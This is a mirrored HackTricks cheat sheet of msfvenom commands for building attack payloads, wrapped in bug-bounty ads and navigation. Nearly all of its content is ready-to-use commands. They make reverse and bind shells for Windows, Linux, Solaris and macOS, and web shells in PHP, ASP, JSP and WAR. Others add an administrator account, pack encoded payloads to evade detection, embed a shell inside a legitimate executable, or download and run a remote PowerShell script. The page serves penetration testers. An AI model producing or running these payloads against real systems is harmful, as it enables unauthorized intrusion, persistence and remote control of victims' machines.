Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00

CPol 036fa3c3a6

GITBOOK-4040: change request with no subject merged in GitBook

2023-08-16 09:26:10 +00:00

9 KiB

Raw Blame History

MSFVenom - CheatSheet

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

Basic msfvenom

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

One can also use the -a to specify the architecture or the --platform

Listing

msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Windows

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe

{% endcode %}

Create User

{% code overflow="wrap" %}

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

{% endcode %}

CMD Shell

{% code overflow="wrap" %}

msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe

{% endcode %}

Execute Command

{% code overflow="wrap" %}

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe

{% endcode %}

Encoder

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe

{% endcode %}

Embedded inside executable

{% code overflow="wrap" %}

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe

{% endcode %}

Linux Payloads

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

{% endcode %}

SunOS (Solaris)

{% code overflow="wrap" %}

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

{% endcode %}

MAC Payloads

Reverse Shell:

{% code overflow="wrap" %}

msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho

{% endcode %}

Bind Shell

{% code overflow="wrap" %}

msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho

{% endcode %}

Web Based Payloads

PHP

Reverse shell

{% code overflow="wrap" %}

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

{% endcode %}

ASP/x

Reverse shell

{% code overflow="wrap" %}

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx

{% endcode %}

JSP

Reverse shell

{% code overflow="wrap" %}

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp

{% endcode %}

WAR

Reverse Shell

{% code overflow="wrap" %}

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war

{% endcode %}

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)

Script Language payloads

Perl

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

{% endcode %}

Python

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py

{% endcode %}

Bash

{% code overflow="wrap" %}

msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

{% endcode %}

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

9 KiB Raw Blame History

MSFVenom - CheatSheet

Basic msfvenom

Listing

Common params when creating a shellcode

Windows

Reverse Shell

Bind Shell

Create User

CMD Shell

Execute Command

Encoder

Embedded inside executable

Linux Payloads

Reverse Shell

Bind Shell

SunOS (Solaris)

MAC Payloads

Reverse Shell:

Bind Shell

Web Based Payloads

PHP

Reverse shell

ASP/x

Reverse shell

JSP

Reverse shell

WAR

Reverse Shell

NodeJS

Script Language payloads

Perl

Python

Bash

9 KiB

Raw Blame History